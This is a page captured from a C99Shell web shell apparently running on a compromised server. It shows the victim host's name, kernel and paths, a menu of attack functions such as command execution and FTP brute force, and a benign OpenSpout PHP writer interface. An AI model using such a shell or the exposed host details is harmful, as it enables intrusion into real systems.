!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/vendor/openspout/openspout/src/Writer/   drwxr-xr-x
Free 28.53 GB of 117.98 GB (24.18%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     WriterInterface.php (2.21 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

declare(strict_types=1);

namespace 
OpenSpout\Writer;

use 
OpenSpout\Common\Entity\Row;
use 
OpenSpout\Common\Exception\InvalidArgumentException;
use 
OpenSpout\Common\Exception\IOException;

interface 
WriterInterface
{
    
/**
     * Initializes the writer and opens it to accept data.
     * By using this method, the data will be written to a file.
     *
     * @param string $outputFilePath Path of the output file that will contain the data
     *
     * @throws IOException If the writer cannot be opened or if the given path is not writable
     */
    
public function openToFile(string $outputFilePath): void;

    
/**
     * Initializes the writer and opens it to accept data.
     * By using this method, the data will be outputted directly to the browser.
     *
     * @param string $outputFileName Name of the output file that will contain the data. If a path is passed in, only the file name will be kept
     *
     * @throws IOException If the writer cannot be opened
     */
    
public function openToBrowser(string $outputFileName): void;

    
/**
     * Appends a row to the end of the stream.
     *
     * @param Row $row The row to be appended to the stream
     *
     * @throws Exception\WriterNotOpenedException If the writer has not been opened yet
     * @throws IOException                        If unable to write data
     */
    
public function addRow(Row $row): void;

    
/**
     * Appends the rows to the end of the stream.
     *
     * @param Row[] $rows The rows to be appended to the stream
     *
     * @throws InvalidArgumentException           If the input param is not valid
     * @throws Exception\WriterNotOpenedException If the writer has not been opened yet
     * @throws IOException                        If unable to write data
     */
    
public function addRows(array $rows): void;

    
/**
     * Set document creator.
     *
     * @param string $creator document creator
     */
    
public function setCreator(string $creator): void;

    
/**
     * @return 0|positive-int
     */
    
public function getWrittenRowCount(): int;

    
/**
     * Closes the writer. This will close the streamer as well, preventing new data
     * to be written to the file.
     */
    
public function close(): void;
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0059 ]--